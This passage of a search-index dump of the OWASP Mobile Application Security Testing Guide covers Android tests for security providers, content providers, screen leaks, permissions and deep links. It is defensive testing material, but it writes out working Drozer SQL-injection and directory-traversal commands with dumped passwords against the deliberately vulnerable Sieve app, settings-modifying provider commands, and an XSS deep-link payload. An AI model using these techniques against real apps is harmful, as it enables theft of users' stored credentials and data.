"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/","title":"Testing the Security Provider","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#static-analysis","title":"Static Analysis","text":"Applications based on the Android SDK should depend on GooglePlayServices. For example, in the gradle build file, you will find compile 'com.google.android.gms:play-services-gcm:x.x.x'
in the dependencies block. You need to make sure that the ProviderInstaller
class is called with either installIfNeeded
or installIfNeededAsync
. ProviderInstaller
needs to be called by a component of the application as early as possible. Exceptions thrown by these methods should be caught and handled correctly. If the application cannot patch its security provider, it can either inform the API of its less secure state or restrict user actions (because all HTTPS traffic should be deemed riskier in this situation).
If you have access to the source code, check if the app handle any exceptions related to the security provider updates properly, and if it reports to the backend when the application is working with an unpatched security provider. The Android Developer documentation provides different examples showing how to update the Security Provider to prevent SSL exploits.
Lastly, make sure that NDK-based applications bind only to a recent and properly patched library that provides SSL/TLS functionality.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#dynamic-analysis","title":"Dynamic Analysis","text":"When you have the source code:
Evaluate Expression
.Security.getProviders()
and press enter.GmsCore_OpenSSL
, which should be the new top-listed provider.When you do not have the source code:
java.security
package, then hook into java.security.Security
with the method getProviders
(with no arguments). The return value will be an array of Provider
.GmsCore_OpenSSL
.The first step is to look at AndroidManifest.xml
to detect content providers exposed by the app. You can identify content providers by the <provider>
element. Complete the following steps:
android:exported
) is \"true\"
. Even if it is not, the tag will be set to \"true\"
automatically if an <intent-filter>
has been defined for the tag. If the content is meant to be accessed only by the app itself, set android:exported
to \"false\"
. If not, set the flag to \"true\"
and define proper read/write permissions.android:permission
). Permission tags limit exposure to other apps.android:protectionLevel
attribute has the value signature
. This setting indicates that the data is intended to be accessed only by apps from the same enterprise (i.e., signed with the same key). To make the data accessible to other apps, apply a security policy with the <permission>
element and set a proper android:protectionLevel
. If you use android:permission
, other applications must declare corresponding <uses-permission>
elements in their manifests to interact with your content provider. You can use the android:grantUriPermissions
attribute to grant more specific access to other apps; you can limit access with the <grant-uri-permission>
element.Inspect the source code to understand how the content provider is meant to be used. Search for the following keywords:
android.content.ContentProvider
android.database.Cursor
android.database.sqlite
.query
.update
.delete
To avoid SQL injection attacks within the app, use parameterized query methods, such as query
, update
, and delete
. Be sure to properly sanitize all method arguments; for example, the selection
argument could lead to SQL injection if it is made up of concatenated user input.
If you expose a content provider, determine whether parameterized query methods (query
, update
, and delete
) are being used to prevent SQL injection. If so, make sure all their arguments are properly sanitized.
We will use the vulnerable password manager app Sieve as an example of a vulnerable content provider.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#inspect-the-android-manifest","title":"Inspect the Android Manifest","text":"Identify all defined <provider>
elements:
<provider\n android:authorities=\"com.mwr.example.sieve.DBContentProvider\"\n android:exported=\"true\"\n android:multiprocess=\"true\"\n android:name=\".DBContentProvider\">\n <path-permission\n android:path=\"/Keys\"\n android:readPermission=\"com.mwr.example.sieve.READ_KEYS\"\n android:writePermission=\"com.mwr.example.sieve.WRITE_KEYS\"\n />\n</provider>\n<provider\n android:authorities=\"com.mwr.example.sieve.FileBackupProvider\"\n android:exported=\"true\"\n android:multiprocess=\"true\"\n android:name=\".FileBackupProvider\"\n/>\n
As shown in the AndroidManifest.xml
above, the application exports two content providers. Note that one path (\"/Keys\") is protected by read and write permissions.
Inspect the query
function in the DBContentProvider.java
file to determine whether any sensitive information is being leaked:
Example in Java:
public Cursor query(final Uri uri, final String[] array, final String s, final String[] array2, final String s2) {\n final int match = this.sUriMatcher.match(uri);\n final SQLiteQueryBuilder sqLiteQueryBuilder = new SQLiteQueryBuilder();\n if (match >= 100 && match < 200) {\n sqLiteQueryBuilder.setTables(\"Passwords\");\n }\n else if (match >= 200) {\n sqLiteQueryBuilder.setTables(\"Key\");\n }\n return sqLiteQueryBuilder.query(this.pwdb.getReadableDatabase(), array, s, array2, (String)null, (String)null, s2);\n}\n
Example in Kotlin:
fun query(uri: Uri?, array: Array<String?>?, s: String?, array2: Array<String?>?, s2: String?): Cursor {\n val match: Int = this.sUriMatcher.match(uri)\n val sqLiteQueryBuilder = SQLiteQueryBuilder()\n if (match >= 100 && match < 200) {\n sqLiteQueryBuilder.tables = \"Passwords\"\n } else if (match >= 200) {\n sqLiteQueryBuilder.tables = \"Key\"\n }\n return sqLiteQueryBuilder.query(this.pwdb.getReadableDatabase(), array, s, array2, null as String?, null as String?, s2)\n }\n
Here we see that there are actually two paths, \"/Keys\" and \"/Passwords\", and the latter is not being protected in the manifest and is therefore vulnerable.
When accessing a URI, the query statement returns all passwords and the path Passwords/
. We will address this in the \"Dynamic Analysis\" section and show the exact URI that is required.
To dynamically analyze an application's content providers, first enumerate the attack surface: pass the app's package name to the Drozer module app.provider.info
:
dz> run app.provider.info -a com.mwr.example.sieve\n Package: com.mwr.example.sieve\n Authority: com.mwr.example.sieve.DBContentProvider\n Read Permission: null\n Write Permission: null\n Content Provider: com.mwr.example.sieve.DBContentProvider\n Multiprocess Allowed: True\n Grant Uri Permissions: False\n Path Permissions:\n Path: /Keys\n Type: PATTERN_LITERAL\n Read Permission: com.mwr.example.sieve.READ_KEYS\n Write Permission: com.mwr.example.sieve.WRITE_KEYS\n Authority: com.mwr.example.sieve.FileBackupProvider\n Read Permission: null\n Write Permission: null\n Content Provider: com.mwr.example.sieve.FileBackupProvider\n Multiprocess Allowed: True\n Grant Uri Permissions: False\n
In this example, two content providers are exported. Both can be accessed without permission, except for the /Keys
path in the DBContentProvider
. With this information, you can reconstruct part of the content URIs to access the DBContentProvider
(the URIs begin with content://
).
To identify content provider URIs within the application, use Drozer's scanner.provider.finduris
module. This module guesses paths and determines accessible content URIs in several ways:
dz> run scanner.provider.finduris -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nUnable to Query content://com.mwr.example.sieve.DBContentProvider/\n...\nUnable to Query content://com.mwr.example.sieve.DBContentProvider/Keys\nAccessible content URIs:\ncontent://com.mwr.example.sieve.DBContentProvider/Keys/\ncontent://com.mwr.example.sieve.DBContentProvider/Passwords\ncontent://com.mwr.example.sieve.DBContentProvider/Passwords/\n
Once you have a list of accessible content providers, try to extract data from each provider with the app.provider.query
module:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical\n_id: 1\nservice: Email\nusername: incognitoguy50\npassword: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64 - encoded)\nemail: incognitoguy50@gmail.com\n
You can also use Drozer to insert, update, and delete records from a vulnerable content provider:
dz> run app.provider.insert content://com.vulnerable.im/messages\n --string date 1331763850325\n --string type 0\n --integer _id 7\n
dz> run app.provider.update content://settings/secure\n --selection \"name=?\"\n --selection-args assisted_gps_enabled\n --integer value 0\n
dz> run app.provider.delete content://settings/secure\n --selection \"name=?\"\n --selection-args my_setting\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#sql-injection-in-content-providers","title":"SQL Injection in Content Providers","text":"The Android platform promotes SQLite databases for storing user data. Because these databases are based on SQL, they may be vulnerable to SQL injection. You can use the Drozer module app.provider.query
to test for SQL injection by manipulating the projection and selection fields that are passed to the content provider:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"'\"\nunrecognized token: \"' FROM Passwords\" (code 1): , while compiling: SELECT ' FROM Passwords\n\ndz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection \"'\"\nunrecognized token: \"')\" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')\n
If an application is vulnerable to SQL Injection, it will return a verbose error message. SQL Injection on Android may be used to modify or query data from the vulnerable content provider. In the following example, the Drozer module app.provider.query
is used to list all the database tables:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"*\nFROM SQLITE_MASTER WHERE type='table';--\"\n| type | name | tbl_name | rootpage | sql |\n| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |\n| table | Passwords | Passwords | 4 | CREATE TABLE ... |\n| table | Key | Key | 5 | CREATE TABLE ... |\n
SQL Injection may also be used to retrieve data from otherwise protected tables:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"* FROM Key;--\"\n| Password | pin |\n| thisismypassword | 9876 |\n
You can automate these steps with the scanner.provider.injection
module, which automatically finds vulnerable content providers within an app:
dz> run scanner.provider.injection -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nInjection in Projection:\n content://com.mwr.example.sieve.DBContentProvider/Keys/\n content://com.mwr.example.sieve.DBContentProvider/Passwords\n content://com.mwr.example.sieve.DBContentProvider/Passwords/\nInjection in Selection:\n content://com.mwr.example.sieve.DBContentProvider/Keys/\n content://com.mwr.example.sieve.DBContentProvider/Passwords\n content://com.mwr.example.sieve.DBContentProvider/Passwords/\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#file-system-based-content-providers","title":"File System Based Content Providers","text":"Content providers can provide access to the underlying filesystem. This allows apps to share files (the Android sandbox normally prevents this). You can use the Drozer modules app.provider.read
and app.provider.download
to read and download files, respectively, from exported file-based content providers. These content providers are susceptible to directory traversal, which allows otherwise protected files in the target application's sandbox to be read.
dz> run app.provider.download content://com.vulnerable.app.FileProvider/../../../../../../../../data/data/com.vulnerable.app/database.db /home/user/database.db\nWritten 24488 bytes\n
Use the scanner.provider.traversal
module to automate the process of finding content providers that are susceptible to directory traversal:
dz> run scanner.provider.traversal -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nVulnerable Providers:\n content://com.mwr.example.sieve.FileBackupProvider/\n content://com.mwr.example.sieve.FileBackupProvider\n
Note that adb
can also be used to query content providers:
$ adb shell content query --uri content://com.owaspomtg.vulnapp.provider.CredentialProvider/credentials\nRow: 0 id=1, username=admin, password=StrongPwd\nRow: 1 id=2, username=test, password=test\n...\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/","title":"Checking for Sensitive Data Disclosure Through the User Interface","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#static-analysis","title":"Static Analysis","text":"Carefully review all UI components that either show such information or take it as input. Search for any traces of sensitive information and evaluate if it should be masked or completely removed.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#text-fields","title":"Text Fields","text":"To make sure an application is masking sensitive user input, check for the following attribute in the definition of EditText
:
android:inputType=\"textPassword\"\n
With this setting, dots (instead of the input characters) will be displayed in the text field, preventing the app from leaking passwords or pins to the user interface.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#app-notifications","title":"App Notifications","text":"When statically assessing an application, it is recommended to search for any usage of the NotificationManager
class which might be an indication of some form of notification management. If the class is being used, the next step would be to understand how the application is generating the notifications.
These code locations can be fed into the Dynamic Analysis section below, providing an idea of where in the application notifications may be dynamically generated.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#dynamic-analysis","title":"Dynamic Analysis","text":"To determine whether the application leaks any sensitive information to the user interface, run the application and identify components that could be disclosing information.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#text-fields_1","title":"Text Fields","text":"If the information is masked by, for example, replacing input with asterisks or dots, the app isn't leaking data to the user interface.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#app-notifications_1","title":"App Notifications","text":"To identify the usage of notifications run through the entire application and all its available functions looking for ways to trigger any notifications. Consider that you may need to perform actions outside of the application in order to trigger certain notifications.
While running the application you may want to start tracing all calls to functions related to the notifications creation, e.g. setContentTitle
or setContentText
from NotificationCompat.Builder
. Observe the trace in the end and evaluate if it contains any sensitive information.
A screenshot of the current activity is taken when an Android app goes into background and displayed for aesthetic purposes when the app returns to the foreground. However, this may leak sensitive information.
To determine whether the application may expose sensitive information via the app switcher, find out whether the FLAG_SECURE
option has been set. You should find something similar to the following code snippet:
Example in Java:
getWindow().setFlags(WindowManager.LayoutParams.FLAG_SECURE,\n WindowManager.LayoutParams.FLAG_SECURE);\n\nsetContentView(R.layout.activity_main);\n
Example in Kotlin:
window.setFlags(WindowManager.LayoutParams.FLAG_SECURE,\n WindowManager.LayoutParams.FLAG_SECURE)\n\nsetContentView(R.layout.activity_main)\n
If the option has not been set, the application is vulnerable to screen capturing.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0010/#dynamic-analysis","title":"Dynamic Analysis","text":"While black-box testing the app, navigate to any screen that contains sensitive information and click the home button to send the app to the background, then press the app switcher button to see the snapshot. As shown below, if FLAG_SECURE
is set (left image), the snapshot will be empty; if the flag has not been set (right image), activity information will be shown:
On devices supporting file-based encryption (FBE), snapshots are stored in the /data/system_ce/<USER_ID>/<IMAGE_FOLDER_NAME>
folder. <IMAGE_FOLDER_NAME>
depends on the vendor but most common names are snapshots
and recent_images
. If the device doesn't support FBE, the /data/system/<IMAGE_FOLDER_NAME>
folder is used.
Accessing these folders and the snapshots requires root.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/","title":"Testing for App Permissions","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#overview","title":"Overview","text":"When testing app permissions the goal is to try and reduce the amount of permissions used by your app to the absolute minimum. While going through each permission, remember that it is best practice first to try and evaluate whether your app needs to use this permission because many functionalities such as taking a photo can be done without, limiting the amount of access to sensitive data. If permissions are required you will then make sure that the request/response to access the permission is handled handled correctly.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#android-permissions","title":"Android Permissions","text":"Check permissions to make sure that the app really needs them and remove unnecessary permissions. For example, the INTERNET
permission in the AndroidManifest.xml file is necessary for an Activity to load a web page into a WebView. Because a user can revoke an application's right to use a dangerous permission, the developer should check whether the application has the appropriate permission each time an action is performed that would require that permission.
<uses-permission android:name=\"android.permission.INTERNET\" />\n
Go through the permissions with the developer to identify the purpose of every permission set and remove unnecessary permissions.
Besides going through the AndroidManifest.xml file manually, you can also use the Android Asset Packaging tool (aapt) to examine the permissions of an APK file.
aapt comes with the Android SDK within the build-tools folder. It requires an APK file as input. You may list the APKs in the device by running adb shell pm list packages -f | grep -i <keyword>
as seen in \"Listing Installed Apps\".
$ aapt d permissions app-x86-debug.apk\npackage: sg.vp.owasp_mobile.omtg_android\nuses-permission: name='android.permission.WRITE_EXTERNAL_STORAGE'\nuses-permission: name='android.permission.INTERNET'\n
Alternatively you may obtain a more detailed list of permissions via adb and the dumpsys tool:
$ adb shell dumpsys package sg.vp.owasp_mobile.omtg_android | grep permission\n requested permissions:\n android.permission.WRITE_EXTERNAL_STORAGE\n android.permission.INTERNET\n android.permission.READ_EXTERNAL_STORAGE\n install permissions:\n android.permission.INTERNET: granted=true\n runtime permissions:\n
Please reference this permissions overview for descriptions of the listed permissions that are considered dangerous.
READ_CALENDAR\nWRITE_CALENDAR\nREAD_CALL_LOG\nWRITE_CALL_LOG\nPROCESS_OUTGOING_CALLS\nCAMERA\nREAD_CONTACTS\nWRITE_CONTACTS\nGET_ACCOUNTS\nACCESS_FINE_LOCATION\nACCESS_COARSE_LOCATION\nRECORD_AUDIO\nREAD_PHONE_STATE\nREAD_PHONE_NUMBERS\nCALL_PHONE\nANSWER_PHONE_CALLS\nADD_VOICEMAIL\nUSE_SIP\nBODY_SENSORS\nSEND_SMS\nRECEIVE_SMS\nREAD_SMS\nRECEIVE_WAP_PUSH\nRECEIVE_MMS\nREAD_EXTERNAL_STORAGE\nWRITE_EXTERNAL_STORAGE\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#custom-permissions","title":"Custom Permissions","text":"Apart from enforcing custom permissions via the application manifest file, you can also check permissions programmatically. This is not recommended, however, because it is more error-prone and can be bypassed more easily with, e.g., runtime instrumentation. It is recommended that the ContextCompat.checkSelfPermission
method is called to check if an activity has a specified permission. Whenever you see code like the following snippet, make sure that the same permissions are enforced in the manifest file.
private static final String TAG = \"LOG\";\nint canProcess = checkCallingOrSelfPermission(\"com.example.perm.READ_INCOMING_MSG\");\nif (canProcess != PERMISSION_GRANTED)\nthrow new SecurityException();\n
Or with ContextCompat.checkSelfPermission
which compares it to the manifest file.
if (ContextCompat.checkSelfPermission(secureActivity.this, Manifest.READ_INCOMING_MSG)\n != PackageManager.PERMISSION_GRANTED) {\n //!= stands for not equals PERMISSION_GRANTED\n Log.v(TAG, \"Permission denied\");\n }\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#requesting-permissions","title":"Requesting Permissions","text":"If your application has permissions that need to be requested at runtime, the application must call the requestPermissions
method in order to obtain them. The app passes the permissions needed and an integer request code you have specified to the user asynchronously, returning once the user chooses to accept or deny the request in the same thread. After the response is returned the same request code is passed to the app's callback method.
private static final String TAG = \"LOG\";\n// We start by checking the permission of the current Activity\nif (ContextCompat.checkSelfPermission(secureActivity.this,\n Manifest.permission.WRITE_EXTERNAL_STORAGE)\n != PackageManager.PERMISSION_GRANTED) {\n\n // Permission is not granted\n // Should we show an explanation?\n if (ActivityCompat.shouldShowRequestPermissionRationale(secureActivity.this,\n //Gets whether you should show UI with rationale for requesting permission.\n //You should do this only if you do not have permission and the permission requested rationale is not communicated clearly to the user.\n Manifest.permission.WRITE_EXTERNAL_STORAGE)) {\n // Asynchronous thread waits for the users response.\n // After the user sees the explanation try requesting the permission again.\n } else {\n // Request a permission that doesn't need to be explained.\n ActivityCompat.requestPermissions(secureActivity.this,\n new String[]{Manifest.permission.WRITE_EXTERNAL_STORAGE},\n MY_PERMISSIONS_REQUEST_WRITE_EXTERNAL_STORAGE);\n // MY_PERMISSIONS_REQUEST_WRITE_EXTERNAL_STORAGE will be the app-defined int constant.\n // The callback method gets the result of the request.\n }\n} else {\n // Permission already granted debug message printed in terminal.\n Log.v(TAG, \"Permission already granted.\");\n}\n
Please note that if you need to provide any information or explanation to the user it needs to be done before the call to requestPermissions
, since the system dialog box can not be altered once called.
Now your app has to override the system method onRequestPermissionsResult
to see if the permission was granted. This method receives the requestCode
integer as input parameter (which is the same request code that was created in requestPermissions
).
The following callback method may be used for WRITE_EXTERNAL_STORAGE
.
@Override //Needed to override system method onRequestPermissionsResult()\npublic void onRequestPermissionsResult(int requestCode, //requestCode is what you specified in requestPermissions()\n String permissions[], int[] permissionResults) {\n switch (requestCode) {\n case MY_PERMISSIONS_WRITE_EXTERNAL_STORAGE: {\n if (grantResults.length > 0\n && permissionResults[0] == PackageManager.PERMISSION_GRANTED) {\n // 0 is a canceled request, if int array equals requestCode permission is granted.\n } else {\n // permission denied code goes here.\n Log.v(TAG, \"Permission denied\");\n }\n return;\n }\n // Other switch cases can be added here for multiple permission checks.\n }\n}\n
Permissions should be explicitly requested for every needed permission, even if a similar permission from the same group has already been requested. For applications targeting Android 7.1 (API level 25) and older, Android will automatically give an application all the permissions from a permission group, if the user grants one of the requested permissions of that group. Starting with Android 8.0 (API level 26), permissions will still automatically be granted if a user has already granted a permission from the same permission group, but the application still needs to explicitly request the permission. In this case, the onRequestPermissionsResult
handler will automatically be triggered without any user interaction.
For example if both READ_EXTERNAL_STORAGE
and WRITE_EXTERNAL_STORAGE
are listed in the Android Manifest but only permissions are granted for READ_EXTERNAL_STORAGE
, then requesting WRITE_EXTERNAL_STORAGE
will automatically have permissions without user interaction because they are in the same group and not explicitly requested.
Always check whether the application is requesting permissions it actually requires. Make sure that no permissions are requested which are not related to the goal of the app, especially DANGEROUS
and SIGNATURE
permissions, since they can affect both the user and the application if mishandled. For instance, it should be suspicious if a single-player game app requires access to android.permission.WRITE_SMS
.
When analyzing permissions, you should investigate the concrete use case scenarios of the app and always check if there are replacement APIs for any DANGEROUS
permissions in use. A good example is the SMS Retriever API which streamlines the usage of SMS permissions when performing SMS-based user verification. By using this API an application does not have to declare DANGEROUS
permissions which is a benefit to both the user and developers of the application, who doesn't have to submit the Permissions Declaration Form.
Permissions for installed applications can be retrieved with adb
. The following extract demonstrates how to examine the permissions used by an application.
$ adb shell dumpsys package com.google.android.youtube\n...\ndeclared permissions:\n com.google.android.youtube.permission.C2D_MESSAGE: prot=signature, INSTALLED\nrequested permissions:\n android.permission.INTERNET\n android.permission.ACCESS_NETWORK_STATE\ninstall permissions:\n com.google.android.c2dm.permission.RECEIVE: granted=true\n android.permission.USE_CREDENTIALS: granted=true\n com.google.android.providers.gsf.permission.READ_GSERVICES: granted=true\n...\n
The output shows all permissions using the following categories:
When doing the dynamic analysis:
android.permission.WRITE_SMS
, might not be a good idea.ACCESS_COARSE_LOCATION
permission instead of ACCESS_FINE_LOCATION
. Or even better not requesting the permission at all, and instead ask the user to enter a postal code.ACTION_IMAGE_CAPTURE
or ACTION_VIDEO_CAPTURE
intent action instead of requesting the CAMERA
permission.ACCESS_FINE_LOCATION
, ACCESS_COARSE_LOCATIION
, or BLUETOOTH_ADMIN
permissions.To obtain detail about a specific permission you can refer to the Android Documentation.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/","title":"Testing Deep Links","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#overview","title":"Overview","text":"Any existing deep links (including App Links) can potentially increase the app attack surface. This includes many risks such as link hijacking, sensitive functionality exposure, etc.
All deep links must be enumerated and verified for correct website association. The actions they perform must be well tested, especially all input data, which should be deemed untrustworthy and thus should always be validated.
None of the input from these sources can be trusted; it must be validated and/or sanitized. Validation ensures processing of data that the app is expecting only. If validation is not enforced, any input can be sent to the app, which may allow an attacker or malicious app to exploit app functionality.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#check-for-android-os-version","title":"Check for Android OS Version","text":"The Android version in which the app runs also influences the risk of using deep links. Inspect the Android Manifest to check if minSdkVersion
is 31 or higher.
Inspecting the Android Manifest:
You can easily determine whether deep links (with or without custom URL schemes) are defined by decoding the app using apktool and inspecting the Android Manifest file looking for <intent-filter>
elements.
myapp://
.<activity android:name=\".MyUriActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.VIEW\" />\n <category android:name=\"android.intent.category.DEFAULT\" />\n <category android:name=\"android.intent.category.BROWSABLE\" />\n <data android:scheme=\"myapp\" android:host=\"path\" />\n </intent-filter>\n</activity>\n
http://
and https://
schemes, along with the host and path that will activate it (in this case, the full URL would be https://www.myapp.com/my/app/path
):<intent-filter>\n ...\n <data android:scheme=\"http\" android:host=\"www.myapp.com\" android:path=\"/my/app/path\" />\n <data android:scheme=\"https\" android:host=\"www.myapp.com\" android:path=\"/my/app/path\" />\n</intent-filter>\n
<intent-filter>
includes the flag android:autoVerify=\"true\"
, this causes the Android system to reach out to the declared android:host
in an attempt to access the Digital Asset Links file in order to verify the App Links. A deep link can be considered an App Link only if the verification is successful.<intent-filter android:autoVerify=\"true\">\n
When listing deep links remember that <data>
elements within the same <intent-filter>
are actually merged together to account for all variations of their combined attributes.
<intent-filter>\n ...\n <data android:scheme=\"https\" android:host=\"www.example.com\" />\n <data android:scheme=\"app\" android:host=\"open.my.app\" />\n</intent-filter>\n
It might seem as though this supports only https://www.example.com
and app://open.my.app
. However, it actually supports:
https://www.example.com
app://open.my.app
app://www.example.com
https://open.my.app
Using Dumpsys:
Use adb to run the following command that will show all schemes:
adb shell dumpsys package com.example.package\n
Using Android \"App Link Verification\" Tester:
Use the Android \"App Link Verification\" Tester script to list all deep links (list-all
) or only app links (list-applinks
):
python3 deeplink_analyser.py -op list-all -apk ~/Downloads/example.apk\n\n.MainActivity\n\napp://open.my.app\napp://www.example.com\nhttps://open.my.app\nhttps://www.example.com\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#check-for-correct-website-association","title":"Check for Correct Website Association","text":"Even if deep links contain the android:autoVerify=\"true\"
attribute, they must be actually verified in order to be considered App Links. You should test for any possible misconfigurations that might prevent full verification.
Use the Android \"App Link Verification\" Tester script to get the verification status for all app links (verify-applinks
). See an example here.
Only on Android 12 (API level 31) or higher:
You can use adb to test the verification logic regardless of whether the app targets Android 12 (API level 31) or not. This feature allows you to:
You can also review the verification results. For example:
adb shell pm get-app-links com.example.package\n\ncom.example.package:\n ID: 01234567-89ab-cdef-0123-456789abcdef\n Signatures: [***]\n Domain verification state:\n example.com: verified\n sub.example.com: legacy_failure\n example.net: verified\n example.org: 1026\n
The same information can be found by running adb shell dumpsys package com.example.package
(only on Android 12 (API level 31) or higher).
This section details a few, of potentially many, reasons why the verification process failed or was not actually triggered. See more information in the Android Developers Documentation and in the white paper \"Measuring the Insecurity of Mobile Deep Links of Android\".
Check the Digital Asset Links file:
/.well-known/
path. Example: https://www.example.com/.well-known/assetlinks.json
https://digitalassetlinks.googleapis.com/v1/statements:list?source.web.site=www.example.com
Check for Redirects:
To enhance the app security, the system doesn't verify any Android App Links for an app if the server sets a redirect such as http://example.com
to https://example.com
or example.com
to www.example.com
.
Check for Subdomains:
If an intent filter lists multiple hosts with different subdomains, there must be a valid Digital Asset Links file on each domain. For example, the following intent filter includes www.example.com
and mobile.example.com
as accepted intent URL hosts.
<application>\n <activity android:name=\u201dMainActivity\u201d>\n <intent-filter android:autoVerify=\"true\">\n <action android:name=\"android.intent.action.VIEW\" />\n <category android:name=\"android.intent.category.DEFAULT\" />\n <category android:name=\"android.intent.category.BROWSABLE\" />\n <data android:scheme=\"https\" />\n <data android:scheme=\"https\" />\n <data android:host=\"www.example.com\" />\n <data android:host=\"mobile.example.com\" />\n </intent-filter>\n </activity>\n</application>\n
In order for the deep links to correctly register, a valid Digital Asset Links file must be published at both https://www.example.com/.well-known/assetlinks.json
and https://mobile.example.com/.well-known/assetlinks.json
.
Check for Wildcards:
If the hostname includes a wildcard (such as *.example.com
), you should be able to find a valid Digital Asset Links file at the root hostname: https://example.com/.well-known/assetlinks.json
.
Even if the deep link is correctly verified, the logic of the handler method should be carefully analyzed. Pay special attention to deep links being used to transmit data (which is controlled externally by the user or any other app).
First, obtain the name of the Activity from the Android Manifest <activity>
element which defines the target <intent-filter>
and search for usage of getIntent
and getData
. This general approach of locating these methods can be used across most applications when performing reverse engineering and is key when trying to understand how the application uses deep links and handles any externally provided input data and if it could be subject to any kind of abuse.
The following example is a snippet from an exemplary Kotlin app decompiled with jadx. From the static analysis we know that it supports the deep link deeplinkdemo://load.html/
as part of com.mstg.deeplinkdemo.WebViewActivity
.
// snippet edited for simplicity\npublic final class WebViewActivity extends AppCompatActivity {\n private ActivityWebViewBinding binding;\n\n public void onCreate(Bundle savedInstanceState) {\n Uri data = getIntent().getData();\n String html = data == null ? null : data.getQueryParameter(\"html\");\n Uri data2 = getIntent().getData();\n String deeplink_url = data2 == null ? null : data2.getQueryParameter(\"url\");\n View findViewById = findViewById(R.id.webView);\n if (findViewById != null) {\n WebView wv = (WebView) findViewById;\n wv.getSettings().setJavaScriptEnabled(true);\n if (deeplink_url != null) {\n wv.loadUrl(deeplink_url);\n ...\n
You can simply follow the deeplink_url
String variable and see the result from the wv.loadUrl
call. This means the attacker has full control of the URL being loaded to the WebView (as shown above has JavaScript enabled.
The same WebView might be also rendering an attacker controlled parameter. In that case, the following deep link payload would trigger Reflected Cross-Site Scripting (XSS) within the context of the WebView:
deeplinkdemo://load.html?attacker_controlled=<svg onload=alert(1)>\n
But there are many other possibilities. Be sure to check the following sections to learn more about what to expect and how to test different scenarios:
In addition, we recommend to search and read public reports (search term: \"deep link*\"|\"deeplink*\" site:https://hackerone.com/reports/
). For example:
Here you will use the list of deep links from the static analysis to iterate and determine each handler method and the processed data, if any. You will first start a Frida hook and then begin invoking the deep links.
The following example assumes a target app that accepts this deep link: deeplinkdemo://load.html
. However, we don't know the corresponding handler method yet, nor the parameters it potentially accepts.
[Step 1] Frida Hooking:
You can use the script \"Android Deep Link Observer\" from Frida CodeShare to monitor all invoked deep links triggering a call to Intent.getData
. You can also use the script as a base to include your own modifications depending on the use case at hand. In this case we included the stack trace in the script since we are interested in the method which calls Intent.getData
.
[Step 2] Invoking Deep Links:
Now you can invoke any of the deep links using adb and the Activity Manager (am) which will send intents within the Android device. For example:
adb shell am start -W -a android.intent.action.VIEW -d \"deeplinkdemo://load.html/?message=ok#part1\"\n\nStarting: Intent { act=android.intent.action.VIEW dat=deeplinkdemo://load.html/?message=ok }\nStatus: ok\nLaunchState: WARM\nActivity: com.mstg.deeplinkdemo/.WebViewActivity\nTotalTime: 210\nWaitTime: 217\nComplete\n
This might trigger the disambiguation dialog when using the \"http/https\" schema or if other installed apps support the same custom URL schema. You can include the package name to make it an explicit intent.
This invocation will log the following:
[*] Intent.getData() was called\n[*] Activity: com.mstg.deeplinkdemo.WebViewActivity\n[*] Action: android.intent.action.VIEW\n\n[*] Data\n- Scheme: deeplinkdemo://\n- Host: /load.html\n- Params: message=ok\n- Fragment: part1\n\n[*] Stacktrace:\n\nandroid.content.Intent.getData(Intent.java)\ncom.mstg.deeplinkdemo.WebViewActivity.onCreate(WebViewActivity.kt)\nandroid.app.Activity.performCreate(Activity.java)\n...\ncom.android.internal.os.ZygoteInit.main(ZygoteInit.java)\n
In this case we've crafted the deep link including arbitrary parameters (?message=ok
) and fragment (#part1
